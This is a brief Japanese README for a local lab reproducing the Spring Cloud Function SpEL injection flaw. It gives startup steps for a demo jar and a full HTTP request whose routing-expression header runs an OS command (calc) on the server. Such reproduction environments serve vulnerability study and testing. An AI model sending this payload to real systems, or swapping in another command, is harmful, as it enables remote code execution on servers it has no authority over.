詳細は個人ブログをご覧ください https://pizz33.github.io/
Spring Cloud Function SpEL式インジェクション用のテスト環境
バージョン java11 で java -jar demo-0.0.1-SNAPSHOT.jar を実行して起動
構築完了後、127.0.0.1:8080ポートにアクセス

POST /functionRouter HTTP/1.1
Host: 127.0.0.1:8080
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("calc")
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
xxx
